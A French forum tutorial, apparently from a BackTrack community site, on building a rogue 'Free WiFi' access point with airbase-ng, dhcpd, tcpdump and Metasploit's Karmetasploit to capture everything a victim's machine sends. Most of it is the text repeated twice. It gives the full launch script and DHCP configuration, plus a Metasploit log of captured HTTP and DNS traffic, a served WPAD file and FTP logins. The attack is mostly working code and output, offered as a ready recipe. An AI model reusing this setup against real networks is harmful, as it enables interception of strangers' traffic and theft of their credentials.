Nous allons voir ici comment créer un faux AP afin de récupérer les données transitant par notre pc, une fois que quelqu'un s'y est connecté.
Il faut pour cela qu'aircrack et metasploit soient à jour. On peut tout updater depuis fastrack.
voici ma configuration pour cet exemple : 2 machines distinctes (NB = Notebook), un routeur, un fake AP donc PAS de vm.
+--------+ +--------+ +-------------+
| router +----rj45-----+ NB BT3 +-----------+ AP Alfa 500 +
+--------+ +--------+ +---+---------+
/|\
*
connection
*
|
+--------+ +-----------------+
+ NB XP +-------------+ Wifi Wus54gc +
+--------+ +-----------------+
1) création du script qui va lancer karmetasploit
contenu
Ne pas oublier de le rendre exécutable
Télécharger le ici : http://backtrack-fr.net/test/karma/karmetasploit.sh
2) création du fichier dhcpd.conf
contenu
Télécharger le ici : http://backtrack-fr.net/test/karma/dhcpd.conf
3) Voila il ne nous reste plus qu'à lancer notre script
les modules se loadent et le server démarre
4) on vérifie si notre fake AP est visible
5) Depuis notre poste windows, on lance notre wifi manager
6) et on se connecte sur le free WIFI ::
7) Regardons si on reçoit quelque chose sur notre server
8) Tout ce qui transite par notre machine est capturé est sauvegardé dans un fichier que nous pourrons exploiter.
Nous allons donc ouvir le fichier "/pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap" avec wireshark.
On constate que c'est bel et bien ce que l'on avait sur notre écran
Source : forum.backtrack-fr.net
Il faut pour cela qu'aircrack et metasploit soient à jour. On peut tout updater depuis fastrack.
voici ma configuration pour cet exemple : 2 machines distinctes (NB = Notebook), un routeur, un fake AP donc PAS de vm.
+--------+ +--------+ +-------------+
| router +----rj45-----+ NB BT3 +-----------+ AP Alfa 500 +
+--------+ +--------+ +---+---------+
/|\
*
connection
*
|
+--------+ +-----------------+
+ NB XP +-------------+ Wifi Wus54gc +
+--------+ +-----------------+
1) création du script qui va lancer karmetasploit
Code:
bt Desktop # kedit karmetasploit.sh
Code:
#!/bin/bash killall -9 dhcpd tcpdump airbase-ng airmon-ng start wlan0 modprobe tun airbase-ng -P -C 30 -c 7 -e "Free WiFi" -v wlan0 >/dev/null 2>&1 & sleep 2 ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 sleep 2 echo > /var/state/dhcp/dhcpd.leases dhcpd -cf /pentest/exploits/framework3/dhcpd.conf at0 sleep 2 ifconfig at0 mtu 1800 tcpdump -ni at0 -s 0 -w /pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap >/dev/null 2>&1 & /pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc
Ne pas oublier de le rendre exécutable
Code:
bt Desktop # chmod +x karmetasploit.sh
2) création du fichier dhcpd.conf
Code:
bt Desktop # kedit /pentest/exploits/framework3/dhcpd.conf
Code:
option domain-name-servers 10.0.0.1; default-lease-time 60; max-lease-time 72; ddns-update-style none; authoritative; log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option routers 10.0.0.1; option domain-name-servers 10.0.0.1; }
3) Voila il ne nous reste plus qu'à lancer notre script
Code:
bt Desktop # ./karmetasploit.sh
les modules se loadent et le server démarre
4) on vérifie si notre fake AP est visible
5) Depuis notre poste windows, on lance notre wifi manager
6) et on se connecte sur le free WIFI ::
7) Regardons si on reçoit quelque chose sur notre server
8) Tout ce qui transite par notre machine est capturé est sauvegardé dans un fichier que nous pourrons exploiter.
Nous allons donc ouvir le fichier "/pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap" avec wireshark.
On constate que c'est bel et bien ce que l'on avait sur notre écran
Code:
[*] HTTP REQUEST 10.0.0.254 > download.windowsupdate.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows cookies=[*] HTTP REQUEST 10.0.0.254 > download.windowsupdate.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows cookies=[*] HTTP REQUEST 10.0.0.254 > download.windowsupdate.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows cookies=[*] DNS 10.0.0.254:49836 XID 42755 (IN::A wpad)[*] HTTP wpad.dat sent to 10.0.0.254[*] HTTP REQUEST 10.0.0.254 > download.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows cookies=[*] HTTP REQUEST 10.0.0.254 > download.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows cookies=[*] HTTP REQUEST 10.0.0.254 > download.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows cookies=[*] HTTP REQUEST 10.0.0.254 > download.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows cookies=[*] HTTP REQUEST 10.0.0.254 > update.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows cookies=[*] HTTP REQUEST 10.0.0.254 > update.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows cookies=[*] HTTP REQUEST 10.0.0.254 > update.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows cookies=[*] HTTP REQUEST 10.0.0.254 > update.microsoft.com:80 HEAD /v8/windowsupdate/redir/muv3wuredir.cab Windows cookies=[*] DNS 10.0.0.254:62629 XID 21450 (IN::A www.symantec.com)[*] DNS 10.0.0.254:57988 XID 17388 (IN::A liveupdate.symantecliveupdate.com)[*] HTTP REQUEST 10.0.0.254 > liveupdate.symantecliveupdate.com:80 GET /minitri.flg Unknown cookies=[*] HTTP REQUEST 10.0.0.254 > liveupdate.symantecliveupdate.com:80 GET /livetri.zip Unknown cookies=[*] DNS 10.0.0.254:51388 XID 59332 (IN::A liveupdate.symantec.com)[*] HTTP REQUEST 10.0.0.254 > liveupdate.symantec.com:80 GET /minitri.flg Unknown cookies=[*] HTTP REQUEST 10.0.0.254 > liveupdate.symantec.com:80 GET /livetri.zip Unknown cookies=[*] DNS 10.0.0.254:65278 XID 60765 (IN::A update.symantec.com)[*] FTP LOGIN 10.0.0.254:1107 cust-r2 / xxxxxxx[*] FTP LOGIN 10.0.0.254:1108 cust-r2 / xxxxxxx